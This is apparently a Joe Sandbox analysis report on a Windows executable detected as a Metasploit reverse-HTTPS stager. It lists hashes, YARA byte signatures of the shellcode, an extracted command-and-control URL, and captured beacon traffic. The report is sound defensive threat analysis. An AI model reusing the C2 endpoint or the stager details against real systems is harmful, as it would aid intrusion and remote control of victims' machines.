Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
443_2003_https-df.exe

Overview

General Information

Sample name:443_2003_https-df.exe
Analysis ID:1636969
MD5:8d9c0f42baf129d1b430a01463dd7870
SHA1:4054be8879b458c034340b19311baa42218c216d
SHA256:b3ffbb213580aac6f9dc8d7ea321bd61be3e5cd41647e29aabeaedee2bfc4b83
Tags:exemalwareRozenauser-Joker
Infos:

Detection

Metasploit
Score:96
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Metasploit Payload
C2 URLs / IPs found in malware configuration
Joe Sandbox ML detected suspicious sample
AV process strings found (often used to terminate AV products)
Entry point lies outside standard sections
JA3 SSL client fingerprint seen in connection with other malware
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Uses a known web browser user agent for HTTP communication
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 443_2003_https-df.exe (PID: 2820 cmdline: "C:\Users\user\Desktop\443_2003_https-df.exe" MD5: 8D9C0F42BAF129D1B430A01463DD7870)
    • WerFault.exe (PID: 1412 cmdline: C:\Windows\system32\WerFault.exe -u -p 2820 -s 1812 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • cleanup

Malware Configuration

Threatname: Metasploit

{"Type": "Metasploit Connect", "URL": "http://good.com:443/8vQ22xQg7LNTDlIMNMPQYArU3f6H02_CZ8OOidXHMpAcnJyNIO6pn76hpViAmussoSRLD1bYoU6XZKlPgy7zC1CqcV1CM8wQUy9ZNCBo7-biF1YmM12TNtT9dyohlNI7ULo8ROSViioXkYj1b3ud_S"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
443_2003_https-df.exeJoeSecurity_MetasploitPayload_2Yara detected Metasploit PayloadJoe Security
    443_2003_https-df.exeJoeSecurity_MetasploitPayload_3Yara detected Metasploit PayloadJoe Security
      443_2003_https-df.exeWindows_Trojan_Metasploit_0f5a852dIdentifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families.unknown
      • 0x18db:$a: 49 BE 77 69 6E 69 6E 65 74 00 41 56 48 89 E1 49 C7 C2 4C 77 26 07 FF D5
      443_2003_https-df.exeWindows_Trojan_Metasploit_c9773203Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families.unknown
      • 0x1881:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000000.1043770401.0000000140004000.00000080.00000001.01000000.00000003.sdmpJoeSecurity_MetasploitPayload_3Yara detected Metasploit PayloadJoe Security
        00000000.00000000.1043770401.0000000140004000.00000080.00000001.01000000.00000003.sdmpWindows_Trojan_Metasploit_0f5a852dIdentifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families.unknown
        • 0xdb:$a: 49 BE 77 69 6E 69 6E 65 74 00 41 56 48 89 E1 49 C7 C2 4C 77 26 07 FF D5
        00000000.00000000.1043770401.0000000140004000.00000080.00000001.01000000.00000003.sdmpWindows_Trojan_Metasploit_c9773203Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families.unknown
        • 0x81:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
        00000000.00000002.1160864358.0000000140004000.00000080.00000001.01000000.00000003.sdmpJoeSecurity_MetasploitPayload_3Yara detected Metasploit PayloadJoe Security
          00000000.00000002.1160864358.0000000140004000.00000080.00000001.01000000.00000003.sdmpWindows_Trojan_Metasploit_0f5a852dIdentifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families.unknown
          • 0xdb:$a: 49 BE 77 69 6E 69 6E 65 74 00 41 56 48 89 E1 49 C7 C2 4C 77 26 07 FF D5
          Click to see the 1 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.0.443_2003_https-df.exe.140000000.0.unpackJoeSecurity_MetasploitPayload_3Yara detected Metasploit PayloadJoe Security
            0.0.443_2003_https-df.exe.140000000.0.unpackWindows_Trojan_Metasploit_0f5a852dIdentifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families.unknown
            • 0x1723:$a: 49 BE 77 69 6E 69 6E 65 74 00 41 56 48 89 E1 49 C7 C2 4C 77 26 07 FF D5
            0.0.443_2003_https-df.exe.140000000.0.unpackWindows_Trojan_Metasploit_c9773203Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families.unknown
            • 0x16c9:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
            0.2.443_2003_https-df.exe.140000000.0.unpackJoeSecurity_MetasploitPayload_3Yara detected Metasploit PayloadJoe Security
              0.2.443_2003_https-df.exe.140000000.0.unpackWindows_Trojan_Metasploit_0f5a852dIdentifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families.unknown
              • 0x1723:$a: 49 BE 77 69 6E 69 6E 65 74 00 41 56 48 89 E1 49 C7 C2 4C 77 26 07 FF D5
              Click to see the 1 entries

              Sigma Signatures

              No Sigma rule has matched

              Suricata Signatures

              No Suricata rule has matched

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: 443_2003_https-df.exeAvira: detected
              Found malware configuration
              Source: 443_2003_https-df.exeMalware Configuration Extractor: Metasploit {"Type": "Metasploit Connect", "URL": "http://good.com:443/8vQ22xQg7LNTDlIMNMPQYArU3f6H02_CZ8OOidXHMpAcnJyNIO6pn76hpViAmussoSRLD1bYoU6XZKlPgy7zC1CqcV1CM8wQUy9ZNCBo7-biF1YmM12TNtT9dyohlNI7ULo8ROSViioXkYj1b3ud_S"}
              Multi AV Scanner detection for submitted file
              Source: 443_2003_https-df.exeVirustotal: Detection: 78%Perma Link
              Source: 443_2003_https-df.exeReversingLabs: Detection: 84%
              Joe Sandbox ML detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: unknownHTTPS traffic detected: 74.82.86.0:443 -> 192.168.2.9:49683 version: TLS 1.2

              Networking

              barindex
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: http://good.com:443/8vQ22xQg7LNTDlIMNMPQYArU3f6H02_CZ8OOidXHMpAcnJyNIO6pn76hpViAmussoSRLD1bYoU6XZKlPgy7zC1CqcV1CM8wQUy9ZNCBo7-biF1YmM12TNtT9dyohlNI7ULo8ROSViioXkYj1b3ud_S
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: global trafficHTTP traffic detected: GET /8vQ22xQg7LNTDlIMNMPQYArU3f6H02_CZ8OOidXHMpAcnJyNIO6pn76hpViAmussoSRLD1bYoU6XZKlPgy7zC1CqcV1CM8wQUy9ZNCBo7-biF1YmM12TNtT9dyohlNI7ULo8ROSViioXkYj1b3ud_S HTTP/1.1Host: cdn123.offseccdn.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Cache-Control: no-cache
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: C:\Users\user\Desktop\443_2003_https-df.exeCode function: 0_2_00000001400042B6 VirtualAlloc,InternetReadFile,0_2_00000001400042B6
              Source: global trafficHTTP traffic detected: GET /8vQ22xQg7LNTDlIMNMPQYArU3f6H02_CZ8OOidXHMpAcnJyNIO6pn76hpViAmussoSRLD1bYoU6XZKlPgy7zC1CqcV1CM8wQUy9ZNCBo7-biF1YmM12TNtT9dyohlNI7ULo8ROSViioXkYj1b3ud_S HTTP/1.1Host: cdn123.offseccdn.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Cache-Control: no-cache
              Source: global trafficDNS traffic detected: DNS query: good.com
              Source: Amcache.hve.3.drString found in binary or memory: http://upx.sf.net
              Source: 443_2003_https-df.exe, 00000000.00000002.1160246720.0000000000577000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://good.com/
              Source: 443_2003_https-df.exe, 00000000.00000002.1160246720.0000000000577000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://good.com/8vQ22xQg7LNTDlIMNMPQYArU3f6H02_CZ8OOidXHMpAcnJyNIO6pn76hpViAmussoSRLD1bYoU6XZKlPgy7
              Source: 443_2003_https-df.exe, 00000000.00000002.1160246720.0000000000577000.00000004.00000020.00020000.00000000.sdmp, 443_2003_https-df.exe, 00000000.00000002.1160429536.00000000005DD000.00000004.00000020.00020000.00000000.sdmp, 443_2003_https-df.exe, 00000000.00000002.1160712596.0000000002A50000.00000040.00001000.00020000.00000000.sdmp, 443_2003_https-df.exe, 00000000.00000003.1076984923.00000000005DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.blackberry.com
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49683
              Source: unknownNetwork traffic detected: HTTP traffic on port 49683 -> 443
              Source: unknownHTTPS traffic detected: 74.82.86.0:443 -> 192.168.2.9:49683 version: TLS 1.2

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 443_2003_https-df.exe, type: SAMPLEMatched rule: Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families. Author: unknown
              Source: 443_2003_https-df.exe, type: SAMPLEMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
              Source: 0.0.443_2003_https-df.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families. Author: unknown
              Source: 0.0.443_2003_https-df.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
              Source: 0.2.443_2003_https-df.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families. Author: unknown
              Source: 0.2.443_2003_https-df.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
              Source: 00000000.00000000.1043770401.0000000140004000.00000080.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families. Author: unknown
              Source: 00000000.00000000.1043770401.0000000140004000.00000080.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
              Source: 00000000.00000002.1160864358.0000000140004000.00000080.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families. Author: unknown
              Source: 00000000.00000002.1160864358.0000000140004000.00000080.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
              Source: C:\Users\user\Desktop\443_2003_https-df.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2820 -s 1812
              Source: 443_2003_https-df.exe, type: SAMPLEMatched rule: Windows_Trojan_Metasploit_0f5a852d os = windows, severity = x86, description = Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families., creation_date = 2021-04-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 97daac4249e85a73d4e6a4450248e59e0d286d5e7c230cf32a38608f8333f00d, id = 0f5a852d-cacd-43d7-8754-204b09afba2f, last_modified = 2021-08-23
              Source: 443_2003_https-df.exe, type: SAMPLEMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
              Source: 0.0.443_2003_https-df.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Metasploit_0f5a852d os = windows, severity = x86, description = Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families., creation_date = 2021-04-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 97daac4249e85a73d4e6a4450248e59e0d286d5e7c230cf32a38608f8333f00d, id = 0f5a852d-cacd-43d7-8754-204b09afba2f, last_modified = 2021-08-23
              Source: 0.0.443_2003_https-df.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
              Source: 0.2.443_2003_https-df.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Metasploit_0f5a852d os = windows, severity = x86, description = Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families., creation_date = 2021-04-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 97daac4249e85a73d4e6a4450248e59e0d286d5e7c230cf32a38608f8333f00d, id = 0f5a852d-cacd-43d7-8754-204b09afba2f, last_modified = 2021-08-23
              Source: 0.2.443_2003_https-df.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
              Source: 00000000.00000000.1043770401.0000000140004000.00000080.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_0f5a852d os = windows, severity = x86, description = Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families., creation_date = 2021-04-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 97daac4249e85a73d4e6a4450248e59e0d286d5e7c230cf32a38608f8333f00d, id = 0f5a852d-cacd-43d7-8754-204b09afba2f, last_modified = 2021-08-23
              Source: 00000000.00000000.1043770401.0000000140004000.00000080.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
              Source: 00000000.00000002.1160864358.0000000140004000.00000080.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_0f5a852d os = windows, severity = x86, description = Identifies 64 bit metasploit wininet reverse shellcode. May also be used by other malware families., creation_date = 2021-04-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 97daac4249e85a73d4e6a4450248e59e0d286d5e7c230cf32a38608f8333f00d, id = 0f5a852d-cacd-43d7-8754-204b09afba2f, last_modified = 2021-08-23
              Source: 00000000.00000002.1160864358.0000000140004000.00000080.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
              Source: classification engineClassification label: mal96.troj.winEXE@2/6@1/1
              Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2820
              Source: C:\Windows\System32\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\2c0a8481-0add-47fa-a8eb-a8d5161218d0Jump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: 443_2003_https-df.exeVirustotal: Detection: 78%
              Source: 443_2003_https-df.exeReversingLabs: Detection: 84%
              Source: unknownProcess created: C:\Users\user\Desktop\443_2003_https-df.exe "C:\Users\user\Desktop\443_2003_https-df.exe"
              Source: C:\Users\user\Desktop\443_2003_https-df.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2820 -s 1812
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\443_2003_https-df.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
              Source: 443_2003_https-df.exeStatic PE information: Image base 0x140000000 > 0x60000000
              Source: initial sampleStatic PE information: section where entry point is pointing to: .jcho
              Source: 443_2003_https-df.exeStatic PE information: real checksum: 0xfa97 should be: 0xfc4f
              Source: 443_2003_https-df.exeStatic PE information: section name: .jcho
              Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: Amcache.hve.3.drBinary or memory string: VMware
              Source: Amcache.hve.3.drBinary or memory string: VMware Virtual USB Mouse
              Source: 443_2003_https-df.exe, 00000000.00000002.1160246720.000000000055A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@(Z%SystemRoot%\system32\mswsock.dllkk
              Source: Amcache.hve.3.drBinary or memory string: vmci.syshbin
              Source: Amcache.hve.3.drBinary or memory string: VMware, Inc.
              Source: Amcache.hve.3.drBinary or memory string: VMware20,1hbin@
              Source: Amcache.hve.3.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
              Source: Amcache.hve.3.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
              Source: Amcache.hve.3.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
              Source: 443_2003_https-df.exe, 00000000.00000002.1160246720.0000000000577000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: Amcache.hve.3.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
              Source: Amcache.hve.3.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
              Source: Amcache.hve.3.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
              Source: Amcache.hve.3.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
              Source: Amcache.hve.3.drBinary or memory string: vmci.sys
              Source: Amcache.hve.3.drBinary or memory string: vmci.syshbin`
              Source: Amcache.hve.3.drBinary or memory string: \driver\vmci,\driver\pci
              Source: Amcache.hve.3.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
              Source: Amcache.hve.3.drBinary or memory string: VMware20,1
              Source: Amcache.hve.3.drBinary or memory string: Microsoft Hyper-V Generation Counter
              Source: Amcache.hve.3.drBinary or memory string: NECVMWar VMware SATA CD00
              Source: Amcache.hve.3.drBinary or memory string: VMware Virtual disk SCSI Disk Device
              Source: Amcache.hve.3.drBinary or memory string: VMware-42 27 c7 3b 45 a3 e4 a4-61 bc 19 7c 28 5c 10 19
              Source: Amcache.hve.3.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
